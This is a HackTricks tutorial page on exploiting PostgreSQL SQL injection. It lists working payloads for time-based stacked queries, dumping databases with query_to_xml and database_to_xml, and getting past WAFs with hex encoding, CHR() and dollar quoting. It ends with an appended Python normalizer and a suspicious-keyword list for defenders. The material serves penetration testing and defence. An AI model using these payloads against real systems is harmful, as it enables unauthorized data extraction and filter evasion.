PostgreSQL injection
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
Other ways to support HackTricks:
- If you want to see your company advertised in HackTricks or download HackTricks in PDF, check the SUBSCRIPTION PLANS!
- Get the official PEASS & HackTricks swag
- Discover The PEASS Family, our collection of exclusive NFTs
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @carlospolopm.
- Share your hacking tricks by submitting PRs to the HackTricks and [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) github repos.
Bug bounty tip: sign up for Intigriti, a premium bug bounty platform created by hackers, for hackers! Join us at https://go.intigriti.com/hacktricks today, and start earning bounties up to $100,000!
{% embed url="https://go.intigriti.com/hacktricks" %}
This page aims to explain different tricks that could help you to exploit a SQL injection found in a PostgreSQL database and to complement the tricks you can find on https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md
Network Interaction - Privilege Escalation, Port Scanner, NTLM challenge response disclosure & Exfiltration
The PostgreSQL module dblink offers capabilities for connecting to other PostgreSQL instances and opening TCP connections. Combined with the COPY FROM functionality, this enables actions such as privilege escalation, port scanning and NTLM challenge-response capture. For the detailed methods, check the dedicated page on how to perform these attacks.
Exfiltration example using dblink and large objects
You can read this CTF example to see how to load data inside large objects and then exfiltrate the content of the large objects through the username parameter of the function dblink_connect.
PostgreSQL Attacks: Read/write, RCE, privesc
Check how to compromise the host and escalate privileges from PostgreSQL in:
{% content-ref url="../../../network-services-pentesting/pentesting-postgresql.md" %} pentesting-postgresql.md {% endcontent-ref %}
WAF bypass
PostgreSQL String functions
Manipulating strings could help you to bypass WAFs or other restrictions. The PostgreSQL documentation on string functions lists the functions available for this.
Stacked Queries
Remember that PostgreSQL supports stacked queries, but several applications will throw an error if 2 responses are returned when expecting just 1. However, you can still abuse stacked queries via time-based injection:
```sql
id=1; select pg_sleep(10);-- -
1; SELECT case when (SELECT current_setting('is_superuser'))='on' then pg_sleep(10) end;-- -
```
XML helpers
query_to_xml
This function returns all the data in XML format in a single row, which makes it ideal for dumping a lot of data at once:
```sql
SELECT query_to_xml('select * from pg_user',true,true,'');
```
database_to_xml
This function dumps the whole database in XML format in a single row (be careful if the database is very large, as you may DoS it or even your own client):
```sql
SELECT database_to_xml(true,true,'');
```
Strings in Hex
If you can run queries passing them inside a string (for example through the query_to_xml function), you can use convert_from to pass the string as hex and bypass filters that way:
{% code overflow="wrap" %}
```sql
select encode('select cast(string_agg(table_name, '','') as int) from information_schema.tables', 'hex'), convert_from('\x73656c656374206361737428737472696e675f616767287461626c655f6e616d652c20272c272920617320696e74292066726f6d20696e666f726d6174696f6e5f736368656d612e7461626c6573', 'UTF8');

# Bypass via stacked queries + error based + query_to_xml with hex
;select query_to_xml(convert_from('\x73656c656374206361737428737472696e675f616767287461626c655f6e616d652c20272c272920617320696e74292066726f6d20696e666f726d6174696f6e5f736368656d612e7461626c6573','UTF8'),true,true,'')-- -

# Bypass via boolean + error based + query_to_xml with hex
1 or '1' = (query_to_xml(convert_from('\x73656c656374206361737428737472696e675f616767287461626c655f6e616d652c20272c272920617320696e74292066726f6d20696e666f726d6174696f6e5f736368656d612e7461626c6573','UTF8'),true,true,''))::text-- -
```
{% endcode %}
Forbidden quotes
If you cannot use quotes in your payload you can bypass this with CHR for basic clauses (character concatenation only works for basic queries such as SELECT, INSERT, DELETE, etc. It does not work for all SQL statements):
```sql
SELECT CHR(65) || CHR(87) || CHR(65) || CHR(69);
```
Or with $. These queries return the same results:
```sql
SELECT 'hacktricks';
SELECT $$hacktricks$$;
SELECT $TAG$hacktricks$TAG$;
```
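Added as a defender-side example (not code from the original page): the Python below undoes the three literal encodings covered in the Strings in Hex and Forbidden quotes sections (convert_from hex, CHR() concatenation, dollar quoting) so that a WAF rule or log review sees the real query instead of the obfuscated form. The sample payloads and the SUSPICIOUS keyword list are constructed for this example.

```python
import re

# Constructed sample payloads that mirror the encodings discussed on this page:
# hex inside convert_from(), CHR() concatenation and $$ / $TAG$ dollar quoting.
SAMPLES = [
    "select query_to_xml(convert_from('\\x73656c6563742031','UTF8'),true,true,'')",
    "SELECT CHR(65) || CHR(87) || CHR(65) || CHR(69)",
    "SELECT $TAG$hacktricks$TAG$, $$x$$",
]

HEX_RE = re.compile(r"convert_from\(\s*'\\x([0-9a-fA-F]+)'\s*,\s*'UTF8'\s*\)", re.I)
CHR_RE = re.compile(r"CHR\(\s*\d+\s*\)(?:\s*\|\|\s*CHR\(\s*\d+\s*\))*", re.I)
DOLLAR_RE = re.compile(r"\$([A-Za-z_]*)\$(.*?)\$\1\$", re.S)
# Keywords a reviewer would want surfaced once the literal is readable (assumed list).
SUSPICIOUS = re.compile(
    r"\b(pg_sleep|pg_user|information_schema|query_to_xml|database_to_xml|dblink)\b", re.I)

def _quote(text):
    # Re-emit the decoded text as an ordinary single-quoted SQL literal.
    return "'" + text.replace("'", "''") + "'"

def _decode_hex(m):
    digits = m.group(1)
    if len(digits) % 2:          # odd-length hex is not valid bytea; leave it untouched
        return m.group(0)
    return _quote(bytes.fromhex(digits).decode("utf-8", "replace"))

def _decode_chr(m):
    codes = re.findall(r"CHR\(\s*(\d+)\s*\)", m.group(0), re.I)
    return _quote("".join(chr(int(c)) for c in codes))

def _decode_dollar(m):
    return _quote(m.group(2))

def normalize(sql):
    """Rewrite the three obfuscated literal forms into plain quoted strings."""
    sql = HEX_RE.sub(_decode_hex, sql)
    sql = CHR_RE.sub(_decode_chr, sql)
    return DOLLAR_RE.sub(_decode_dollar, sql)

def flag(sql):
    """Return (normalized_sql, hit); hit is True when a suspicious keyword is
    visible in the normalized form."""
    norm = normalize(sql)
    return norm, bool(SUSPICIOUS.search(norm))

if __name__ == "__main__":
    for s in SAMPLES:
        print(flag(s))
```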